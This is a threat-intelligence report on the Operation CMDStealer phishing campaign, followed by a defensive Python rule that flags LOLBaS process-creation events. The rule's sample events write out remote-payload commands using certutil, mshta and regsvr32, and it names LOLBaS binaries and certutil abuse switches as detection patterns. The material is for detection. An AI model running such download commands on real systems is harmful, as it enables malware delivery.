A financially motivated threat actor has been observed targeting users in Mexico, Peru, and Portugal in a campaign tracked as Operation CMDStealer. It has been active since August 2022 and primarily targets online business accounts with significant cash flow.
Infection chain
According to researchers at BlackBerry, the campaign used phishing emails written in Portuguese and Spanish to lure victims who speak those languages.
These emails appeared to come from government agencies or authoritative entities and contained tax- or traffic-violation-themed lures to create a sense of urgency among the victims.
The harvested information was transmitted to the attacker's server in an HTTP POST request and included the OS language preference, keyboard layout, and OS version and architecture.
Noteworthy points
As part of the campaign, the threat actors used CMD-based scripts, AutoIt scripts, and LOLBaS (living-off-the-land binaries and scripts) to evade traditional security controls. Such techniques have become increasingly common in recent phishing campaigns.
For instance, a phishing kit called ‘File Archivers in the Browser’ was found masquerading as WinRAR or Windows File Explorer windows within the browser, tricking users into executing malicious files.
In another newly devised BEC tactic, attackers used residential IP addresses matching their victims' locations so that logins with compromised credentials appeared to come from the victim's own region and blended in with normal activity.
A phishing attack used PowerShell code laced with meme references to deploy the XWorm malware on victims' systems.
Conclusion
Given the wide range of tactics, organizations must implement robust security measures to detect and block suspicious activity, including the unauthorized execution of LOLBaS. To limit the impact of LOLBaS execution, organizations should enforce the principle of least privilege, a core tenet of zero trust, granting users access only to the resources they need to perform their tasks.
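The detection recommendation above can be made concrete with a simple process-creation triage rule. The following is an added example, not code from BlackBerry's report or from the campaign: it scans constructed events shaped like Windows Sysmon Event ID 1 (process creation) fields and flags LOLBaS executions that were spawned by a script host such as cmd.exe, that carry a URL in the command line, or that use certutil for downloading or decoding rather than certificate work. The LOLBaS list is an illustrative subset of the LOLBAS project catalogue, the parent-process set is an assumption, and the IP addresses in the sample events are from the TEST-NET-3 documentation range.

```python
"""Flag living-off-the-land binary (LOLBaS) executions in process-creation logs.

Added example. The events below are constructed for this example in the shape
of Sysmon Event ID 1 fields; they are not logs from Operation CMDStealer.
"""
import re
from dataclasses import dataclass

# Illustrative subset of binaries catalogued by the LOLBAS project
# (https://lolbas-project.github.io/); use the full list in production.
LOLBAS = {
    "certutil.exe", "mshta.exe", "rundll32.exe", "regsvr32.exe",
    "bitsadmin.exe", "wmic.exe", "msiexec.exe", "cmstp.exe",
}

# Parents that indicate the binary was launched from a script rather than by
# an installer or management agent (assumption for this example).
SCRIPT_PARENTS = {"cmd.exe", "wscript.exe", "cscript.exe", "powershell.exe", "mshta.exe"}

URL_RE = re.compile(r"https?://[^\s\"']+", re.IGNORECASE)
CERTUTIL_ABUSE_RE = re.compile(r"-(urlcache|decode|encode)\b", re.IGNORECASE)


@dataclass
class Finding:
    image: str
    parent: str
    command_line: str
    reasons: list


def basename(path: str) -> str:
    """Lower-cased file name from a Windows (or POSIX) path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def analyze(events):
    """Return one Finding per event whose image is a LOLBaS and which matches
    at least one suspicious condition. Benign LOLBaS use yields no finding."""
    findings = []
    for ev in events:
        image = basename(ev["Image"])
        if image not in LOLBAS:
            continue
        parent = basename(ev["ParentImage"])
        cmd = ev.get("CommandLine", "")
        reasons = []
        if parent in SCRIPT_PARENTS:
            reasons.append(f"spawned by script host {parent}")
        if URL_RE.search(cmd):
            reasons.append("URL in command line (remote payload fetch)")
        if image == "certutil.exe" and CERTUTIL_ABUSE_RE.search(cmd):
            reasons.append("certutil used for download/encoding rather than certificates")
        if reasons:
            findings.append(Finding(image, parent, cmd, reasons))
    return findings


# Constructed sample events (not real telemetry).
SAMPLE_EVENTS = [
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": r"certutil.exe -urlcache -split -f http://203.0.113.10/p.dat C:\Users\Public\p.dat"},
    {"Image": r"C:\Windows\System32\mshta.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "mshta.exe http://203.0.113.10/a.hta"},
    {"Image": r"C:\Windows\System32\rundll32.exe", "ParentImage": r"C:\Windows\System32\svchost.exe",
     "CommandLine": "rundll32.exe shell32.dll,Control_RunDLL"},
    {"Image": r"C:\Windows\System32\certutil.exe", "ParentImage": r"C:\Windows\System32\mmc.exe",
     "CommandLine": "certutil.exe -verify C:\\certs\\server.cer"},
    {"Image": r"C:\Windows\System32\regsvr32.exe", "ParentImage": r"C:\Windows\System32\cmd.exe",
     "CommandLine": "regsvr32.exe /s /u /i:http://203.0.113.10/x.sct scrobj.dll"},
    {"Image": r"C:\Windows\System32\notepad.exe", "ParentImage": r"C:\Windows\explorer.exe",
     "CommandLine": "notepad.exe notes.txt"},
]

if __name__ == "__main__":
    for f in analyze(SAMPLE_EVENTS):
        print(f"{f.image} <- {f.parent}: {'; '.join(f.reasons)}")
```

The rule is deliberately conservative: a LOLBaS run with no suspicious parent, URL, or abuse switch (the certutil -verify and rundll32 Control Panel events) produces nothing, so the output is a triage list rather than an inventory of every LOLBaS launch. In a SIEM the same logic maps directly onto a query over Sysmon or EDR process-creation events, and the parent and switch conditions are where environment-specific tuning belongs.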